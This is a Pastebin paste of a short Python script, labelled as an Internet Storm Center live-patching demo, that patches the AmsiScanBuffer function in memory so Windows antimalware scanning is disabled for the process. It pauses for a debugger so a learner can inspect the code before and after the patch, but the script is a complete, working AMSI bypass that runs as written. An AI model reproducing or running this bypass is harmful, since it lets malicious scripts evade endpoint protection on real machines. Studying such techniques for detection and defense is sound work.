Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #
- # Live-patching demo
- # Internet Storm Center - Xavier Mertens
- # 2024/08/29
- #
- from ctypes import windll
- from ctypes import wintypes
- import ctypes
- import platform
- import sys
- import time
- print("Attach a debugger to this process and press ENTER when ready")
- input()
- kernel32 = windll.kernel32
- LoadLibraryA = kernel32.LoadLibraryA
- LoadLibraryA.argtypes = [wintypes.LPCSTR]
- LoadLibraryA.restype = wintypes.HMODULE
- GetProcAddress = kernel32.GetProcAddress
- GetProcAddress.argtypes = [wintypes.HMODULE, wintypes.LPCSTR]
- GetProcAddress.restype = ctypes.c_void_p
- VirtualProtect = kernel32.VirtualProtect
- VirtualProtect.argtypes = [wintypes.LPVOID, ctypes.c_size_t, wintypes.DWORD, wintypes.PDWORD]
- VirtualProtect.restype = wintypes.BOOL
- RtlMoveMemory = kernel32.RtlMoveMemory
- RtlMoveMemory.argtypes = (wintypes.LPVOID, wintypes.LPVOID, ctypes.c_size_t)
- RtlMoveMemory.restype = wintypes.LPVOID
- GetModuleHandleA = kernel32.GetModuleHandleA
- GetModuleHandleA.argtypes = [wintypes.LPCSTR]
- GetModuleHandleA.restype = wintypes.HMODULE
- RWX = 0x40 # PAGE_EXECUTE_READ_WRITE
- if platform.architecture()[0] == '64bit':
- #print('[*] using x64 based patch')
- patch = (ctypes.c_char * 6)(0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
- if platform.architecture()[0] != '64bit':
- #print('[*] using x86 based patch')
- patch = (ctypes.c_char * 8)(0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00)
- p = GetProcAddress(LoadLibraryA(b"amsi"), b"AmsiScanBuffer")
- print("AmsiScanBuffer() found at this address: 0x%x" % p)
- print("In the debugger, jump to this address and check the code")
- print("Press ENTER to continue")
- input()
- oldprotect = wintypes.DWORD(0)
- VirtualProtect(p, ctypes.sizeof(patch), RWX, ctypes.byref(oldprotect))
- RtlMoveMemory(p, patch, ctypes.sizeof(patch))
- VirtualProtect(p, ctypes.sizeof(patch), oldprotect, ctypes.byref(oldprotect))
- print("AmsiScanBuffer() successfully patched")
- print("Go back to the previous addresses in the debugger and check the patched code!")
- print("Press ENTER to quit")
- input()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement